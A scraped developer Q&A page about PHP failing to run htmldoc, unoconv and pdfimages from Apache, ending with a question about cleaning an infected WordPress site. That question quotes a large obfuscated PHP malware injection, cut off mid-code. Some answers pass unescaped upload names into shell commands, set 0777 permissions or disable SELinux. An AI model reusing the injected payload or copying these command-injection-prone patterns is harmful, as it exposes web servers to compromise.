HTMLDOC does not execute from PHP - php

I am trying to create a PDF from an HTML file from a PHP page (Apache, LAMP) Wierd thing is, when I execute the script from the command line, it works and creates the PDF as expected. However when I browse to the page in my browser, it does nothing. I'm thinking it's a permissions issue somewhere, but I'm stumped! Here's the code. (NOTE the ls command DOES produce output in the browser so it's not just an issue of PHP not being allowed to execute shell commands)
<?php
$htmlName = ("output2/alex" . time() . ".html");
$pdfName = ("output2/alex" . time() . ".pdf");
$html = "<html><body><h1>Hello, World!</h1></body></html>";
$fileHandle = fopen($htmlName, "w+");
fwrite($fileHandle, $html);
fclose($fileHandle);
$command= "htmldoc -t pdf --browserwidth 1000 --embedfonts --header ... --footer t./ --headfootsize 5.0 --fontsize 9 --bodyfont Arial --size letter --top 4 --bottom 25 --left 28 --right 30 --jpeg --webpage $options '$htmlName' -f '$pdfName'";
echo "OUTPUT: \r\n";
$X=passthru($command);
echo "TESTING LS:";
$y=passthru("ls -al");
if(file_exists($htmlName) && file_exists($pdfName)) {
echo "Success.";
} else {
echo "Sorry, it did not create a PDF";
}
?>
When I execute the script from the command line it produces the expected output, and creates a PDF file like it's supposed to:
> php alextest.php
Zend OPcache requires Zend Engine API version 220131226.
The Zend Engine API version 220100525 which is installed, is outdated.
OUTPUT:
PAGES: 1
BYTES: 75403
TESTING LS:total 2036
drwxr-xr-x 9 ----- and so on...
When I browse the page in Chrome, it outputs only the LS command.
help!?


You might try using a full path as your php file my be executing in a different directory than it is saved in depending on how it is loaded. (IE via include, require, or .htaccess or directly by apache.)
IE
$htmlName = ("/home/alex/html/output2/alex" . time() . ".html");
$pdfName = ("/home/alex/html/output2/output2/alex" . time() . ".pdf");
I agree with the comments that using a package like http://dompdf.github.io/ or https://tcpdf.org/ would be best though.


I've seen the same issue, and for the life of me I simply couldn't find the answer to why it wouldn't do it from a web based call, but never a problem from the command line. So, instead of fighting my way to a solution on that front, I created a Perl proxy to allow me to parse PDFs from the command line making it useful for virtually any given purpose. For, with Perl, I've never had a problem parsing PDFs, and I've been doing it for decades now.
So, here's what you do. PHP Code:
exec("/usr/local/bin/perl5 -s /path/to/perl/executable/parse-pdf-from-html-document.pl -source=markup-file.html",$output);
foreach ($output as $aline) {
#- WAS SUCCESSFUL
if (strstr($aline,'Successful!') == TRUE) {
#- no feedback, win silently
}
#- NOT SUCCESSFUL
else {
echo $aline . "\n";
}
}
With $output holding the results of running exec.
Now let's look at the Perl code for parse-pdf-from-html-document.pl:
#!/usr/local/bin/perl5 -s
#- $document coming from commandline variable, via caller: PHP script
$myDocumentLocale = "/path/to/markup/document/".$document;
if (-e $myDocumentLocale) {
$documentHTML = $myDocumentLocale;
$documentPDF = $documentHTML;
$documentPDF =~ s/\.html/\.pdf/gi;
$myDocumentHTML = `cat $myDocumentLocale`;
$badPDF = 0;
$myPDFDocumentLocale = $myDocumentLocale;
$myPDFDocumentLocale =~ s/\.html/\.pdf/gi;
$badPDF = &parsePDF($myDocumentLocale, $myPDFDocumentLocale);
if ($badPDF == 0) {
print "Successful!";
}
else {
print "Error: No PDF Created.";
}
exit;
}
else {
print "Error: No document found.";
exit;
}
sub parsePDF {
my ($Ihtml, $Ipdf) = #_;
$wasBad = 0;
#- create PDF
$ENV{HTMLDOC_NOCGI} = 1;
$commandline="/usr/local/bin/htmldoc -t pdf13 --pagemode document --header ... --footer ... --left 1cm --size Letter --webpage -f $Ipdf $Ihtml";
select(STDOUT);
$| = 1;
#print "Content-Type: application/pdf\n\n";
system($commandline);
if (-e $Ipdf) {
$wasBad = 0;
}
else {
$wasBad = 1;
}
return $wasBad;
}
exit;

Related

Error converting docx to pdf using Unoconv

I am trying to convert .docx files to .pdf files using Unoconv. Libreoffice is installed on my server and the script works for another website on the server.
Using the line use Unoconv\Unoconv; results in an HTTP ERROR 500.
Does someone know why I get a HTTP ERROR 500?
Here is my script:
<?php
require './Unoconv.php';
use Unoconv\Unoconv;
$originFilePath = './uf/invoice/17/word/202100021.docx';
$outputDirPath = './uf/invoice/17/pdf/202100021.pdf';
Unoconv::convertToPdf($originFilePath, $outputDirPath);
header("Content-type:application/pdf");
header("Content-Disposition:attachment;filename=202100021.pdf");
?>
Here is my Unoconv.php script:
<?php
namespace Unoconv;
class Unoconv {
public static function convert($originFilePath, $outputDirPath, $toFormat)
{
$command = 'unoconv --format %s --output %s %s';
$command = sprintf($command, $toFormat, $outputDirPath, $originFilePath);
system($command, $output);
return $output;
}
public static function convertToPdf($originFilePath, $outputDirPath)
{
return self::convert($originFilePath, $outputDirPath, 'pdf');
}
public static function convertToTxt($originFilePath, $outputDirPath)
{
return self::convert($originFilePath, $outputDirPath, 'txt');
}
}
?>

#Alex is correct about wrapping in try/catch first, but should the syntax be:
...
} catch(\Exception $e){
...

Start from wrapping your code with try...catch to get the error message first:
<?php
try {
require 'Unoconv.php';
use Unoconv\Unoconv;
$map1 = $_SESSION['companyid'];
$filename = $result1['filename'];
$originFilePath = './uf/doc/'.$map1.'/word/'.$filename.'.docx';
$outputDirPath = './uf/doc/'.$map1.'/pdf/'.$filename.'.pdf';
Unoconv::convertToPdf($originFilePath, $outputDirPath);
header("Content-type:application/pdf");
header("Content-Disposition:attachment;filename=".$filename.".pdf");
readfile($outputDirPath);
} catch (\Exception $e) {
die($e->getMessage());
}

I've observed that LibreOffice can be a little quirky when doing conversions, especially when running in headless mode from a webserver account.
The simplest thing to try is to modify unoconv to use the same Python binary that is shipped with LibreOffice:
#!/usr/bin/env python
should be (after checking where libreoffice is installed)
#!/opt/libreoffice7.1/program/python
Otherwise, I have worked around the problem by invoking libreoffice directly (without Unoconv):
$dir = dirname($docfile);
// Libreoffice saves here
$pdf = $dir . DIRECTORY_SEPARATOR . basename($docfile, '.docx').'.pdf';
$ret = shell_exec("export HOME={$dir} && /usr/bin/libreoffice --headless --convert-to pdf --outdir '{$dir}' '{$docfile}' 2>&1");
if (file_exists($pdf)) {
rename($pdf, $realPDFName);
} else {
return false;
}
return true;
Note the export HOME={$dir} directive, to ensure that temporary lock files will be saved in the current directory where, presumably, the web server has full permissions. If this requirement isn't met,
LibreOffice will silently fail (or at least, it will fail - that much I observed - and I haven't been able to locate an error message anywhere - I found out what was going on through the use of strace).
So your code would become:
$originFilePath = './uf/invoice/17/word/202100021.docx';
$outputDirPath = './uf/invoice/17/pdf/202100021.pdf';
$dir = dirname($originFilePath);
$pdf = $dir . DIRECTORY_SEPARATOR . basename($originFilePath, '.docx').'.pdf';
$ret = shell_exec("export HOME={$dir} && /usr/bin/libreoffice --headless --convert-to pdf --outdir '{$dir}' '{$originFilePath}' 2>&1");
// $ret will contain any errors
if (!file_exists($pdf)) {
die("Conversion error: " . htmlentities($ret));
}
rename($pdf, $outputDirPath);
header("Content-type:application/pdf");
header("Content-Disposition:attachment;filename=202100021.pdf");
readfile($outputDirPath);
I assume that libreoffice is present in the usual alternatives link of "/usr/bin/libreoffice", otherwise you need to retrieve its path with the terminal command of "which libreoffice". Or, from a php script,
<?php
header('Content-Type: text/plain');
print "If this works:\n";
system('which libreoffice 2>&1');
print "\n-- otherwise a different attempt, returning too much information --\n";
system('locate libreoffice');

Php exec command pdftoimage not work

I have problem with my code.
My Code look like this:
$destinationFolder = $destinationRootFolder . '/';
// mkdir($destinationFolder,777);
$options = $this->buildOptions($saveAsJpeg, $inputPdf, $destinationFolder);
print_r($options);
// exit;
try {
$command = "/usr/bin/pdfimages ".$options[0]." ".$options[1]." ".$options[2];
echo $command;
// exit;
shell_exec($command);
exec($command);
// $command;
// echo $r;
} catch (ExecutionFailureException $e) {
throw new RuntimeException('PdfImages was unable to extract images', $e->getCode(), $e);
}
code entered first command before it executes it. When the copy command to the console everything works well but does not create php files png.
edit
root#mat-K50AB:~# php -a
Interactive mode enabled
php > ls
php > exec("/usr/bin/pdfimages -png /path/pdf/file.pdf /tmp/savefile/")
php > shell_exec("/usr/bin/pdfimages -png /path/pdf/file.pdf /tmp/savefile/")
php >
It also does not work

It sounds like the apache does not have permissions to run it, A few things to check
1) ( if CentOS/RHEL ) Is selinux stoping it, TO temporarly disable it
setenforce 0
Perminetly allow it ( Replace /usr/bin/pdfimages with all files that need access )
chcon -v --type=httpd_sys_content_t /usr/bin/pdfimages
2) Not executible by apache, Try
chmod +x /usr/bin/pdfimages
If nether of thoughs work, What os is your server running?

shell script works fully in terminal but not when run by php

I have a shell script that uses unoconv and then pdftk. when i run the script through the command line it works exactly how i want it to. When i use shell_exec($cmd) in php with the same exact command it runs the script (i know because of the echo's in the script) but it looks like it does not use unoconv (and therefore cannot use pdftk). Any idea on how to troubleshoot this problem? here some code:
if(isset($_FILES["file"]["name"]) && !empty($_FILES["file"]["name"])){
$fname = $_FILES["file"]["name"];
$tmp_name = $_FILES["file"]["tmp_name"];
$dir = "powerpoints/".$name."/";
$ispdf = "1";
$output = shell_exec('mkdir '.$dir);
chmod($dir, 0777);
echo $output;
if(move_uploaded_file($tmp_name, $dir.$fname)){
chmod($dir.$fname, 0777);
$cmd = 'importppt.sh '.$name.' '.str_replace(".ppt", "", $fname);
echo "\n".$cmd;
$output = shell_exec($cmd);
echo $output;
}else{
$message = "move_uploaded_file() Failed";
}
and here is the shell script
#!/bin/bash
echo $1 ' is the argument:' $2 ' is the second '
STRING="/var/www/html/devclassroomproject/powerpoints/"
echo $STRING$1/$2'.ppt '
unoconv $STRING$1/$2'.ppt'
pdftk $STRING$1/$2'.pdf' burst output $STRING$1/$1'_%2d.pdf'
This is what is printed from echos:
importppt.sh pptest pptestpptest is the argument: pptest is the second
/var/www/html/devclassroomproject/powerpoints/pptest/pptest.ppt
edit:
to decipher my debugging
the command: "importppt.sh pptest pptest"
importppt.sh being the shell script; pptest is the first and second argument
printed by the first echo in the shell script: "pptest is the argument: pptest is the second"
printed by the second echo in the script verifying the complete path of the pdf which does exist: "/var/www/html/devclassroomproject/powerpoints/pptest/pptest.ppt"
sorry for the confusion

Found out what was wrong. the answer is here
http://johnparsons.net/index.php/2013/08/05/how-to-keep-unoconv-apache-from-making-you-sad/
basically you have to set up a home directory for the user for apache2 as www-data and change the path to the shell in the passwd file
he doesnt mention it but the changes will not work unless you restart apache

Removing a string in a PHP file with Start and End

I'm trying to clean a WordPress which has been infected by an exploit.
All php files were added a line like this at the beginning of it :
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yaagutonoj = 'Qtpz)#]341]88M4P8]37]278]225]241]334]3672%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) 25)utjm!|!*5!%x5c%x7827!hmg%y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]27]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%xc^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c7,18R#>q%x5c%x7825V<*#fop60gvodujpo)##-!#~<#%x5c%x782f%x5c%xx782fh%x5c%x7825)n%x5c%x7825-#+I#)0~:<h%x5c%x7825_t%x5c%x7825:osvufs:~5c%x7825%x5c%x7878:-6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x782place("%x2f%50%x2e%52%x29%57%x65",x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)su6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78}X%x5c%x7824<!%x5c%x7825tzw>!#]y7)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825>5)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%xx5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#c%x787fw6*CW&)7gj6<*K)ftpmdX^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x78287f_*#ujojRk3%x5c%x7860{6667824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5cqp%x5c%x7825!|Z~!<##!>!2p%%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]x5c%x7825)3of)fepdof%x5c%x7"%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x function fjfgg($n){returnx78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%xl}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)!%x5c%x7825t::!>!%x5c%x7824Ypp5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyidubn%x5c%x7860hfsq)!sp!*5c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%_*#fmjgk4%x5c%x7860{6~6<tfs%x%x7825s:N}#-%x5c%x7825o:W%x5c%x782x787f;!osvufs}w;*%x5c%x787f!>>%x5%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7827824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%86057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%xR25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%5-#jt0}Z;0]=]0#)2q%x5c%x782524-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf4-%x5c%x7824b!>!%x5c%mpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg825h00#*<%x5c%x7825nfd)##x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878p5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x782!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y8j%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5cc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x7%x5c%x7822)!gj}1~!<2p%x5c)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R3x7825yy)#}#-#%x5c%x7824-%x5c%x785h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f61]y33]68]y34]68]y33]65]y31]53]y6d]2ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x78x5c%x7825eN+#Qi%x5c%x78x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%248]y83]256]y81]265]y72]254]y76]7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5cc%x5c%x7825}&;ftmbg}%x5c%61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5dovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x8257%x5c%x782f7###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827x5c%x7825)ppde>u%x5c%x7825V<#65,47]78]K5]53]Kc#<%x5c%x7825tpz!>!#]Dc%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbtcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bu27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR323zbe!-#jt0*?]+^?]_%x5c%x785c6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]5)ufttj%x5c%x7822)gj6<^#Y#78256<pd%x5c%x7825w6Z6<.3%x5c*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj1]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rhW~%x5c%x7825fdy)##-!#~<%x5c%x7;!>!}%x5c%x7827;!>>>!}_;gve%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%%x7824*<!%x5c%x7824-%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]s%x5c%x78256~6<%x5c%x787fw6<*K){hnpd19275fubmgoj{h1:|:%x7825bss-%x5c%x7825r%x5c%x7878B)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x78x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x78|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c5c:>1<%x5c%x7825b:>1<!gpsy7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x7878:<##:>:h%x5c%x7825:<#x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x782525}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#765ww2)%x5c%x7825w%x5c%x78}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%xy39]271]y83]256]y78]#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*17824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjuc%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782fq%x5c%x7825:>:r%x5c%x7825:)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x786Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%42]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss134%x78%62%x35%165%x3a%146%x21%75]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]2ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]48]32M3]317]445]212]445]43]321]464]284]364]6]234]3y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<>!#]y84]275]y83]248]y83]256]judovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}3381]y43]78]y33]65]y31]55]y85]82]y76]62x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&if((function_exists("%x6f%142%x5f%163%x74%141%x860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x7877825%x5c%x785cSFWSFT%x5c%x7860%x5c%x87fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.5Ld]55#*<%x5c%x7825bG9}:c%x7822!pd%x5c%x7825)!gj}%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7f%x5c%x7860439275ttfsqnpdov{h19275jx782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5cx5c%x7827jsv%x5c%x78]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", N58]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x78248]322]3]364]6]283]427]36]373P6]36]73]864y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%xx7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782407825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!5c%x7860LDPT7-UFOJ%x5c%x7860GB)99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%ftpmdXA6|7**197-2qj%x5c%:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67yek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo##00;quui#>.%x5c%x7825!<*4l}%x5c%x7827;%x5c%x782h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%#00#W~!%x5c%x7825t2w)##Qtjw)2]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x6]277]y72]265]y39]274]y85]273]y6g]273]y76]271]<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ULL); }+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f chr(ord($n)-1);} #error_reporting(0); preg_reoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7{ $GLOBALS["%x61%156%x75%156%x61"]=1;epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]yx7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x782567825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x7855c%x7825)fnbozcYufhA%x587fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x7-#w#)ldbqov>*ofmy%x5c%x783]238M7]381]211M5]67]452]88]5]52]y85]256]y6g]257]y86]267]y74f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x7%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825wx5c%x78786<C%x5c%x7827&6<*rfs%x5c3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5cbE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x725)}.;%x5c%x7860UQPMSVD!-id%x5c%24-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%xfubfsdXA%x5c%x7827K6<%x5c%x787fw6*3q4}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]2x7822l:!}V;3q%x5c%x78985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x2f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%xfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rf5!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%xA6~6<u%x5c%x78257>%x5c%%x7825z>2<!%x5c%x782%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M/(.*)/epreg_replacetgodenjrri'; $savthdkijb = explode(chr((172-128)),'6639,47,39,57,8359,37,1364,26,8276,46,633,34,1297,67,3647,46,9998,54,6236,32,730,67,4866,53,8595,47,8086,50,4270,29,8931,45,6153,35,6589,50,3518,55,978,28,9858,23,3432,54,8976,33,4745,64,9640,65,5067,31,7543,24,1390,61,7444,31,9313,36,2878,67,883,38,8703,23,3000,48,3792,59,7023,20,5407,67,4245,25,6872,55,6686,46,8891,40,6768,55,3282,53,1911,29,8491,64,5819,62,4117,63,8762,44,1054,27,1817,52,8726,36,5683,49,8136,42,3371,38,9221,32,7281,51,4840,26,3622,25,1974,33,6847,25,5967,37,3731,61,4535,40,3242,40,7778,52,1518,62,7378,66,4299,68,452,47,8806,25,96,28,667,63,4052,65,9179,42,2420,57,3048,25,7970,70,499,68,1869,42,921,57,8234,42,7686,24,3851,65,830,53,7733,45,1143,26,2551,42,2351,69,8185,49,1741,25,9588,52,2593,52,7475,68,2502,49,3983,69,7637,49,4367,52,1451,67,1270,27,2113,60,6732,36,9060,56,3693,38,7710,23,9705,59,1680,61,6927,35,5098,23,2945,55,2645,62,9116,63,4575,60,5931,36,4477,58,3916,34,2173,59,3109,45,261,25,8322,37,4919,54,9396,21,5546,67,567,66,2232,28,1580,70,4180,30,797,33,8040,46,5351,56,6464,28,124,45,6268,48,8861,30,7332,46,355,36,7567,70,7830,42,321,34,6074,26,5264,62,5474,27,7191,53,5613,46,7900,70,6492,60,9349,47,7084,69,169,53,5881,50,1006,48,2330,21,3154,32,2260,70,5153,66,9253,60,1081,62,4973,26,2067,46,5219,45,286,35,4999,68,6408,56,1650,30,9009,51,3409,23,1766,51,9764,41,5501,45,8396,35,6100,53,4635,58,6004,70,7872,28,4693,52,5121,32,9901,68,9969,29,9417,68,9534,54,3950,33,411,41,10052,54,1234,36,8555,40,4210,35,6823,24,2707,50,3186,56,4809,31,2477,25,0,39,7153,38,8831,30,6358,50,6188,48,2007,60,3573,49,1940,34,5326,25,3073,36,1169,65,7244,37,9805,53,8642,61,222,39,8431,60,6962,61,9881,20,5659,24,9485,49,391,20,2757,67,5752,67,2824,54,4419,58,6316,42,5732,20,3486,32,3335,36,6552,37,7043,41,8178,7'); $nibnkcwalu=substr($yaagutonoj,(49971-39865),(41-34)); if (!function_exists('twwdyxiyuj')) { function twwdyxiyuj($gfkbogqkzl, $xpwveotxbw) { $bepljhengq = NULL; for($oznuhtwycd=0;$oznuhtwycd<(sizeof($gfkbogqkzl)/2);$oznuhtwycd++) { $bepljhengq .= substr($xpwveotxbw, 